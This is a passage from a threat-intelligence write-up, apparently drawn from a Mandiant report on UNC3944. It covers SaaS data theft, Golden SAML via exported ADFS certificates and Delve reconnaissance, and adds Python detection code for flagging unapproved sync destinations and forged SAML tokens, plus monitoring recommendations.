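Detection logic over Airbyte destination log lines in the shape of Figure 4, added here as an example and not from the Mandiant report: it totals the data written per destination bucket and flags buckets that are not an approved sync target. The sample lines, bucket names, file names and the approved-bucket list are constructed.

```python
import re
from collections import defaultdict

# Constructed sample lines modelled on the Airbyte destination log format in Figure 4
# (real lines are single lines; the figure wraps them). Bucket and file names are invented.
SAMPLE_LOG = """\
2023-10-09 15:42:01 destination > INFO a.m.s.StreamTransferManager(uploadStreamPart):558 [Manager uploading to prodbucket11/salesforce/Account/export.csv with id XXdIBNCrR...uvUswAXY-]: Finished uploading [Part number 18 containing 10.01 MB]
2023-10-09 15:42:02 destination > INFO a.m.s.StreamTransferManager(uploadStreamPart):558 [Manager uploading to prodbucket11/salesforce/Account/export.csv with id XXdIBNCrR...uvUswAXY-]: Finished uploading [Part number 19 containing 9.99 MB]
2023-10-09 15:42:03 destination > INFO a.m.s.StreamTransferManager(uploadStreamPart):558 [Manager uploading to corp-dwh-sync/salesforce/Contact/export.csv with id AbCdEf]: Finished uploading [Part number 1 containing 512.00 KB]
2023-10-09 15:42:12 replication-orchestrator > Records read: 3635000 (18 GB)
"""

PART_RE = re.compile(
    r"Manager uploading to (?P<bucket>[^/\s]+)/(?P<stream>[^/\s]+/[^/\s]+)/\S+ with id .*?"
    r"Finished uploading \[Part number \d+ containing (?P<size>[\d.]+) (?P<unit>KB|MB|GB)\]"
)
RECORDS_RE = re.compile(r"Records read: (?P<n>\d+) \((?P<size>[\d.]+) (?P<unit>KB|MB|GB)\)")
TO_MB = {"KB": 1 / 1024, "MB": 1.0, "GB": 1024.0}

def summarize_uploads(log_text):
    """Per destination bucket: megabytes uploaded and the source streams
    (e.g. salesforce/Account) written to it; plus the orchestrator's record total."""
    per_bucket = defaultdict(lambda: {"mb": 0.0, "streams": set()})
    records = None
    for line in log_text.splitlines():
        m = PART_RE.search(line)
        if m:
            entry = per_bucket[m["bucket"]]
            entry["mb"] += float(m["size"]) * TO_MB[m["unit"]]
            entry["streams"].add(m["stream"])
            continue
        m = RECORDS_RE.search(line)
        if m:
            records = (int(m["n"]), float(m["size"]) * TO_MB[m["unit"]])
    for entry in per_bucket.values():
        entry["mb"] = round(entry["mb"], 2)
    return dict(per_bucket), records

def flag_destinations(per_bucket, approved_buckets, max_mb=float("inf")):
    """Destinations worth an alert: buckets the organization never approved as a
    sync target, or approved ones receiving more data than the expected ceiling."""
    findings = {}
    for bucket, entry in per_bucket.items():
        if bucket not in approved_buckets:
            findings[bucket] = "unapproved destination"
        elif entry["mb"] > max_mb:
            findings[bucket] = "volume above threshold"
    return findings
```

The same approach applies to the Fivetran connector logs mentioned above once their line format is known; the value lies in centralizing these logs, since the sync tool itself is the only place the destination bucket is recorded.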

ADFS Targeting

Mandiant has observed UNC3944 targeting Active Directory Federation Services (ADFS), where in use, specifically to export the ADFS certificates. With these certificates, a Golden SAML attack gives the actor easier and persistent access to cloud-based applications. Correlating token-issuance events on the ADFS server with the service provider's sign-in logs can assist with the detection of forged SAML tokens.
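The correlation described above, written out as an added example (not code from the Mandiant report): a federated sign-in at the service provider with no matching ADFS token-issuance event for that user shortly before it is a candidate forged token. The records, field names and relying-party identifier are constructed; ADFS Event ID 1200 is assumed as the issuance event to collect.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed records (not real telemetry). Real inputs would be ADFS security
# audit events (Event ID 1200, "The Federation Service issued a valid token", is
# assumed here as the issuance event) and the service provider's sign-in log;
# the field names below are simplified.
ADFS_TOKENS_ISSUED = [
    {"time": "2023-10-09T15:40:02Z", "upn": "alice@example.com", "relying_party": "urn:federation:MicrosoftOnline"},
    {"time": "2023-10-09T15:41:10Z", "upn": "bob@example.com", "relying_party": "urn:federation:MicrosoftOnline"},
]
SP_SIGNINS = [
    {"time": "2023-10-09T15:40:05Z", "upn": "alice@example.com", "auth": "federated"},
    {"time": "2023-10-09T15:41:12Z", "upn": "Bob@example.com", "auth": "federated"},
    {"time": "2023-10-09T15:55:30Z", "upn": "alice@example.com", "auth": "federated"},    # no ADFS event
    {"time": "2023-10-09T16:00:00Z", "upn": "carol@example.com", "auth": "cloud_password"},  # not federated
]

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")

def unmatched_federated_signins(adfs_events, sp_signins, relying_party, window=timedelta(minutes=5)):
    """Federated sign-ins at the service provider with no token-issuance event on the
    ADFS server for the same user and relying party within `window` before the sign-in.
    A token the federation server never issued is the signature of a Golden SAML token."""
    issued = defaultdict(list)
    for ev in adfs_events:
        if ev["relying_party"] == relying_party:
            issued[ev["upn"].lower()].append(_ts(ev["time"]))
    suspicious = []
    for s in sp_signins:
        if s["auth"] != "federated":
            continue  # cloud-native authentication does not involve ADFS
        t = _ts(s["time"])
        matched = any(timedelta(0) <= t - i <= window for i in issued.get(s["upn"].lower(), []))
        if not matched:
            suspicious.append((s["upn"], s["time"]))
    return suspicious
```

Tune the window to the configured token lifetime and clock skew, and confirm ADFS auditing is actually enabled first, since missing audit events produce the same result as forged tokens.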

Dangers of SaaS Application Access

In addition to the traditional dangers of sensitive data storage, this attack path highlights the dangers of storing data in SaaS-hosted applications. These risks are often overlooked in internal security programs because traditional SaaS models offload some of the risk to the application owner. As part of initial data reconnaissance, Mandiant has observed the use of advanced M365 capabilities, including Microsoft Office Delve, directly inside an M365 tenant to highlight the data sources a compromised account can access.

Delve allows users to quickly view and access files they have access to, whether through group membership or because a file was shared directly with them. These personalized content recommendations aggregate information from various sources within M365, such as files, emails, documents, and conversations. Delve also maps out organizational relationships, including key members within the organization and the user’s direct management chain, and lets a user view recent documents associated with each member of the organization.

Although this is a useful feature for collaboration, UNC3944 has been observed leveraging this application for quick reconnaissance and data mining. Because these files are often sorted by most recent modification date, it also allows for quick identification of active projects, ongoing discussions, and the latest versions of potentially sensitive or confidential information.

"SearchQueryText: and(and(SharedWithUsersOwsUser:|<COMPROMISED.USER>
@, ContentType:Document), and(not(HideFromDelve:"1"), not(OnHold:"1"), 
not(Title:or(OneNote_DeletedPages, OneNote_RecycleBin)), 
not(IsOneNotePage:"1"), not(IsInRecycleBin:"1"), not(ContentType:Folder), 
not(ContentClass:or(STS_ListItem_Categories*, STS_ListItem_852*, 
STS_ListItem_GenericList*, STS_ListItem_544*, STS_ListItem_Tasks*, 
STS_Document*, STS_Site*)),

Figure 5: Example M365 Delve query

Mandiant has observed that these resources are generally excluded from security monitoring tools and have insufficient logging to record the full range of user activities. While SaaS applications such as Salesforce do not set logging verbosity based on a user's license type, the logging granularity is affected by the configuration of debug logs, the audit trail, and whether the add-on feature “Salesforce Shield” is enabled.

Traditional on-premises security controls, such as firewalls and network flow sensors, are ineffective at detecting large outbound data transfers from SaaS platforms because those transfers never traverse the organization's own network. This abstraction makes it difficult to identify data theft using traditional evidence sources such as firewall and NetFlow logs. While historical analysis of SaaS and cloud logs can reveal data theft, real-time detection of this activity remains challenging.


Several courses of action can help mitigate persistence or escalated access in a targeted environment. Mandiant recommends requiring host-based certificates coupled with multi-factor authentication for any VPN access. Additionally, stricter conditional access policies that control what is visible inside a cloud tenant can limit the overall impact.

Multiple detection opportunities exist to speed up the identification of a possible compromise. Mandiant recommends heightened monitoring of SaaS applications, including centralizing logs from important SaaS-based applications, monitoring MFA re-registrations, and watching virtual machine infrastructure, specifically uptime and the creation of new devices.

SaaS applications pose an interesting dilemma for organizations, as there is a gray area around where monitoring should occur and who should conduct it to identify issues. For applications that hold proprietary or guarded information, Mandiant recommends that an organization ensure it has a robust logging capability that its security teams can review for signs of malicious intent.

from Threat Intelligence